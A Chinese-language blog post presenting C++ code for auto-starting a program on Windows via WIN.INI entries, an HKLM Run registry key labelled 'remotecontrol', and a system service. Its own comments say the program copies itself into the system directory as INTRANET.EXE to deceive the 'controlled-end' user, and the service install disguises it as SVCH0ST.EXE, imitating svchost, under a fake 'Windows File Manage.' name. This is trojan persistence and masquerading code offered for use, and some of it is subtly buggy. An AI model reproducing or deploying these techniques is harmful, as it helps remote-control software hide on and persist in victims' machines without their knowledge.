C++实现程序开机自启动

时间:2021-07-21 20:33:13
可以采用以下方式实现自启动:
//拷贝到系统目录
TCHAR TempPath[MAX_PATH];
CString temp;

::GetSystemDirectory(TempPath ,MAX_PATH);
temp = TempPath;
temp = temp + _T("\\INTRANET.EXE");
int len = temp.GetLength();
LPBYTE lpb = new BYTE[len];
for(int j = 0; j < len; j++)
{
    lpb[j] = temp[j];
}
lpb[j] = 0;
//把本程序拷贝到系统目录下,并改名为intranet.exe,这样做的目的是为了迷惑被控制端用户
CopyFile("autoboot.exe", temp ,FALSE);


1.修改WIN.INI(C:\WINDOWS\WIN.INI)文件:

WritePrivateProfileString(_T("windows"), _T("load"), temp, _T("c:\\windows\\win.ini"));
WritePrivateProfileString(_T("windows"), _T("run"), temp, _T("c:\\windows\\win.ini"));

2.采用加载注册表方式启动:
HKEY hKey;
LPCTSTR data_Set="Software\\Microsoft\\Windows\\CurrentVersion\\Run";
long ret0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE,data_Set,0,KEY_WRITE,&hKey));

if(ret0 != ERROR_SUCCESS)
{
    MessageBox("错误0");
}
long ret1=(::RegSetValueEx(hKey,_T("remotecontrol"),NULL,REG_SZ,lpb,len));
if(ret1!=ERROR_SUCCESS)
{//判断系统的相关注册是否成功
   MessageBox("错误1");
}
//关闭注册表中的相应的项
::RegCloseKey(hKey);

3.注册为系统服务:
void WINAPI ServiceMain(DWORD argc, LPTSTR *argv);   //服务主函数
void WINAPI CmdStart(void); //要启动的程序函数
void WINAPI ServiceCtrlHandler(DWORD Opcode);      //服务控制函数
BOOL InstallService();   //安装服务的函数
BOOL DeleteService();   //删除服务的函数

在main函数中执行下列:
SERVICE_TABLE_ENTRY  DispatchTable[]={{SERVR_NAME,ServiceMain},{NULL,NULL}};  //最后的NULL指明数组的结束
StartServiceCtrlDispatcher(DispatchTable); 
InstallService();  //安装服务

void WINAPI ServiceMain(DWORD argc, LPTSTR *argv)
{
m_ServiceStatus.dwServiceType = SERVICE_WIN32;
m_ServiceStatus.dwCurrentState = SERVICE_START_PENDING; 
m_ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP;
m_ServiceStatus.dwWin32ExitCode = 0; 
m_ServiceStatus.dwServiceSpecificExitCode = 0; 
m_ServiceStatus.dwCheckPoint = 0; 
m_ServiceStatus.dwWaitHint = 0;
m_ServiceStatusHandle = RegisterServiceCtrlHandler(SERVR_NAME,ServiceCtrlHandler);
if (m_ServiceStatusHandle == (SERVICE_STATUS_HANDLE)0)
return; 
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; //设置服务状态
m_ServiceStatus.dwCheckPoint = 0; 
m_ServiceStatus.dwWaitHint = 0; 
//SERVICE_STATUS结构含有七个成员,它们反映服务的现行状态。
//所有这些成员必须在这个结构被传递到SetServiceStatus之前正确的设置
SetServiceStatus (m_ServiceStatusHandle, &m_ServiceStatus);
bRunning=true;
//*
    CmdStart(); //启动我们的服务程序
//*
return; 
}

void WINAPI ServiceCtrlHandler(DWORD Opcode)//服务控制函数
{
switch(Opcode) 
{ 
case SERVICE_CONTROL_PAUSE:    
m_ServiceStatus.dwCurrentState = SERVICE_PAUSED; 
break; 
case SERVICE_CONTROL_CONTINUE:  
m_ServiceStatus.dwCurrentState = SERVICE_RUNNING; 
break; 
case SERVICE_CONTROL_STOP:   
m_ServiceStatus.dwWin32ExitCode = 0; 
m_ServiceStatus.dwCurrentState = SERVICE_STOPPED; 
m_ServiceStatus.dwCheckPoint = 0; 
m_ServiceStatus.dwWaitHint = 0; 
SetServiceStatus (m_ServiceStatusHandle,&m_ServiceStatus);
bRunning=false;
break;
case SERVICE_CONTROL_INTERROGATE: 
break; 
} 
return; 
}
BOOL InstallService()   //安装服务函数
{
char strDir[1024];
SC_HANDLE schSCManager,schService;
GetCurrentDirectory(1024,strDir);
GetModuleFileName(NULL,strDir,sizeof(strDir));

char chSysPath[1024];
GetSystemDirectory(chSysPath,sizeof(chSysPath));

strcat(chSysPath,"\\SVCH0ST.EXE");
if(!CopyFile(strDir,chSysPath,FALSE))
return FALSE;                    // 把我们的服务程序复制到系统根目录

strcpy(strDir,chSysPath);
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); 
if (schSCManager == NULL) 
return false;

LPCTSTR lpszBinaryPathName=strDir;

schService = CreateService(schSCManager,SERVR_NAME,"Windows File Manage.", //将服务的信息添加到SCM的数据库
SERVICE_ALL_ACCESS, 
SERVICE_WIN32_OWN_PROCESS, // 服务类型 
SERVICE_AUTO_START, // 启动类型
SERVICE_ERROR_NORMAL,  
lpszBinaryPathName, // 服务名
NULL, 
NULL, 
NULL, 
NULL, 
NULL); 

if (schService == NULL) 
return false; 

if(!StartService(schService,NULL,NULL))   //启动服务
return FALSE;

CloseServiceHandle(schService); 
return true;
}

BOOL DeleteService()
{
SC_HANDLE schSCManager;
SC_HANDLE hService;
schSCManager = OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);

    char chSysPath[1024];
GetSystemDirectory(chSysPath,sizeof(chSysPath));
    strcat(chSysPath,"\\SVCH0ST.EXE");

if (schSCManager == NULL) 
return false; 

hService=OpenService(schSCManager,SERVR_NAME,SERVICE_ALL_ACCESS);
if (hService == NULL) 
return false;

    if(DeleteFile(chSysPath)==0)           
return false;

if(DeleteService(hService)==0)
return false;

if(CloseServiceHandle(hService)==0)
return false;
else
return true;

return TRUE;
}

void WINAPI CmdStart(void)
{
    //.....我们的程序代码
}

标签:

相关文章